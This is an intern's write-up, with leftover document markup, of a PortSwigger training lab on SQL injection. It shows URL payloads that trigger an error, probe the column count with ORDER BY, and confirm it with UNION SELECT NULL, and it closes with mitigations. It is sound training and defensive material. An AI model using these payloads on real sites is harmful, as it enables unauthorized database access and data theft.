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PortSwigger SQL injection lab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Intern id:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 195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Lab :</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection UNION Attack (Determining Number of Columns)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Environment : </w:t>
      </w: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Identify the number of columns returned by the vulnerable SQL query using the UNION SELECT injection technique.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Target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Application: PortSwigger SQLi Lab – UNION attack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Vector: Product category parameter in the URL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Vulnerability Description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application is vulnerable to SQL injection via the category filter parameter. By manipulating the parameter, it is possible to append a UNION SELECT clause. Determining the number of columns is necessary before extracting data.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Browse to the category page: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https://&lt;lab-url&gt;/filter?category=Gifts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Test for injection by appending a single-quote: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https://&lt;lab-url&gt;/filter?category=Gifts'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The server returns an error, confirming SQL injection.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3. Start testing the number of columns using ORDER BY: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https://&lt;lab-url&gt;/filter?category=Gifts' ORDER BY 1--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https://&lt;lab-url&gt;/filter?category=Gifts' ORDER BY 2--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https://&lt;lab-url&gt;/filter?category=Gifts' ORDER BY 3--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ORDER BY 3-- works but ORDER BY 4-- causes an error → the query has 3 columns.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4. Confirm with a UNION SELECT NULL payload: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https://&lt;lab-url&gt;/filter?category=Gifts' UNION SELECT NULL,NULL,NULL--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The page loads successfully, confirming 3 columns.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Explanation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vulnerable SQL query is similar to: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id, name, description FROM products WHERE category = '&lt;input&gt;';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Using ORDER BY reveals how many columns are being selected.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UNION SELECT requires the same number of columns and compatible data types.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Replacing values with NULL ensures type compatibility across columns.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Impact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Once the number of columns is known, an attacker can inject arbitrary data (e.g., usernames, passwords, version info).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This forms the basis for full UNION-based data exfiltration.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Mitigation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Use parameterized queries instead of dynamic SQL.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Implement least privilege database accounts.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Apply error suppression to prevent attackers from learning query structure.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 THANK YOU ___________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